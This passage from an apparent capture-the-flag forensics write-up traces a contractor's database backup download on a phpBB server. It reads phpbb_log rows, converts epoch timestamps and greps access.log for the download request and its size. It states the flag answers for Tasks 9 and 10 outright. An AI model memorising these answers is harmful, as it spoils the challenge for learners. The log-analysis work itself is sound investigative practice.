INSERT INTO phpbb_log VALUES(62,0,48,0,0,0,0,'10.10.0.78',1682506431,'LOG_USERS_ADDED','a:2:{i:0;s:14:"Administrators";i:1;s:6:"apoole";}');
INSERT INTO phpbb_log VALUES(63,0,48,0,0,0,0,'10.10.0.78',1682506471,'LOG_DB_BACKUP','');

Converting Epoch 1682506431 to flag format: DD/MM/YYYY HH:mm:ss can be achieved as shown below:

python3 -c 'from datetime import datetime, timezone; print(datetime.fromtimestamp(1682506431, tz=timezone.utc).strftime("%d/%m/%Y %H:%M:%S"))'
26/04/2023 10:53:51

Task 9

Description: What time did the contractor download the database backup? (UTC) Masked Flag: DD/MM/YYYY HH:mm:ss Flag: 26/04/2023 11:01:38

In phpbb_log, log_id 63 records a LOG_DB_BACKUP at epoch 1682506471, forty seconds after the group change.

..[snip]...
INSERT INTO phpbb_log VALUES(61,0,48,0,0,0,0,'10.10.0.78',1682506392,'LOG_ADMIN_AUTH_SUCCESS','');
INSERT INTO phpbb_log VALUES(62,0,48,0,0,0,0,'10.10.0.78',1682506431,'LOG_USERS_ADDED','a:2:{i:0;s:14:"Administrators";i:1;s:6:"apoole";}');
INSERT INTO phpbb_log VALUES(63,0,48,0,0,0,0,'10.10.0.78',1682506471,'LOG_DB_BACKUP','');

Converting Epoch 1682506471 to flag format: DD/MM/YYYY HH:mm:ss can be achieved as shown below:

python3 -c 'from datetime import datetime, timezone; print(datetime.fromtimestamp(1682506471, tz=timezone.utc).strftime("%d/%m/%Y %H:%M:%S"))'
26/04/2023 10:54:31

This is not the accepted answer. LOG_DB_BACKUP records when the backup was generated in the ACP, and the same epoch, 1682506471, is embedded in the backup's filename; the download itself is a separate HTTP request that only access.log can show.

In access.log we find the GET request that fetched the backup file from /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz, seven minutes after it was created:

cat access.log | fgrep '10.10.0.78' | fgrep 'backup' | fgrep 'GET' | fgrep '200' | tail -n5
10.10.0.78 - - [26/Apr/2023:11:57:07 +0100] "GET /adm/index.php?sid=eca30c1b75dc3eed1720423aa1ff9577&i=acp_database&mode=backup HTTP/1.1" 200 3770 "http://10.10.0.27/adm/index.php?sid=eca30c1b75dc3eed1720423aa1ff9577&i=acp_logs&mode=admin" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
10.10.0.78 - - [26/Apr/2023:11:57:36 +0100] "GET /adm/index.php?sid=eca30c1b75dc3eed1720423aa1ff9577&i=21 HTTP/1.1" 200 3431 "http://10.10.0.27/adm/index.php?sid=eca30c1b75dc3eed1720423aa1ff9577&i=acp_database&mode=backup" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
10.10.0.78 - - [26/Apr/2023:12:01:09 +0100] "GET /adm/index.php?sid=eca30c1b75dc3eed1720423aa1ff9577&i=acp_database&mode=backup HTTP/1.1" 200 3770 "http://10.10.0.27/adm/index.php?sid=eca30c1b75dc3eed1720423aa1ff9577&i=25" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
10.10.0.78 - - [26/Apr/2023:12:01:38 +0100] "GET /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz HTTP/1.1" 200 34707 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
10.10.0.78 - - [26/Apr/2023:12:01:53 +0100] "GET /index.php?sid=be3cc6e2de08bafa4044f552813e2cbe HTTP/1.1" 200 3796 "http://10.10.0.27/adm/index.php?sid=eca30c1b75dc3eed1720423aa1ff9577&i=acp_database&mode=backup" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"

This request was made at 26/Apr/2023:12:01:38 +0100. The log's timestamps carry a +0100 offset, so converting to UTC means subtracting one hour: 26/04/2023 11:01:38.

Task 10

Description: What was the size in bytes of the database backup as stated by access.log? Masked Flag: ****7 Flag: 34707

The response size field of that same log line (the number after the 200 status) shows 34707 bytes were transferred for the backup download.

10.10.0.78 - - [26/Apr/2023:12:01:38 +0100] "GET /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz HTTP/1.1" 200 34707 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
This post is licensed under CC BY 4.0 by the author.